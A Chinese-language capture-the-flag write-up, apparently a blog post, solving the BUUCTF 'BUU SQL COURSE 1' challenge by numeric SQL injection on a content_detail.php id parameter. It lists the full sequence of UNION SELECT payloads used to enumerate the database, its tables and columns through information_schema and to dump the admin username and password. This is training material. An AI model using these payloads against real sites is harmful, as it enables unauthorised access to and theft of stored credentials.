Buuctf | BUU SQL COURSE 1

本文详述了一次针对Buuctf平台的SQL注入攻击过程,重点在于利用304跳转后的content_detail.php页面进行数字注入。通过探测、判断数据库结构和查询敏感数据,最终获取了数据库名news、表名admin及字段信息,成功得到用户名和密码,实现了登录并获得flag。该实例展示了SQL注入在非登录界面的运用和数字注入的常规步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Buuctf |BUU SQL COURSE 1

一、题目链接

https://buuoj.cn/challenges#BUU%20SQL%20COURSE%201

二、实战化演练

1.直接使用弱口令来进行测试

在这里插入图片描述
2.经过多次的测试,都无法注入,说明这个是写死的注册和登录,左边不是有热点吗?查看了一下跳转
在这里插入图片描述
3.通过访问backend/content_detail.php?id=1

在这里插入图片描述
4.通过修改后面的id=1,2,3,均会返回信息,直接使用SQL查询语句

1 and 1=1

在这里插入图片描述
5.我们尝试使用

1 and 1=2

没有任何的回显
在这里插入图片描述
6.判断or是否被过滤

1 or 1=1

在这里插入图片描述
7.判断列数

1 order by 1,2,3

3的时候没有回显,1,2有回显,说明有2
在这里插入图片描述
8.判断显位点

?id=-1 union select 1,2

在这里插入图片描述
9.爆破数据库

?id=-1 union select 1,database()

在这里插入图片描述
10.得到数据库库名news,获取数据表信息

?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='news')

在这里插入图片描述
11.得到表名信息admin,contents,使用admin表,获取字段名信息

?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='news' and table_name='admin')

在这里插入图片描述
12.得到字段名分别是id,username,password,获取username的信息

?id=-1 union select 1,(select group_concat(username) from admin)

在这里插入图片描述
13.获取password的信息

?id=-1 union select 1,(select group_concat(password) from admin)

在这里插入图片描述
14.通过上述SQL注入可以得到用户名和密码

admin
dba223cce96cb458550d0d195bdb2386

15.此时在登录框中输入其用户名和密码,即可得到flag
在这里插入图片描述

三、ps

1.本道题目的新颖之处在于,使用的SQL注入的点,并不是登录界面,而是使用的是304跳转之后的网站;
2.本道题目属于数字注入,比较常规,关键在于能找到注入点

评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值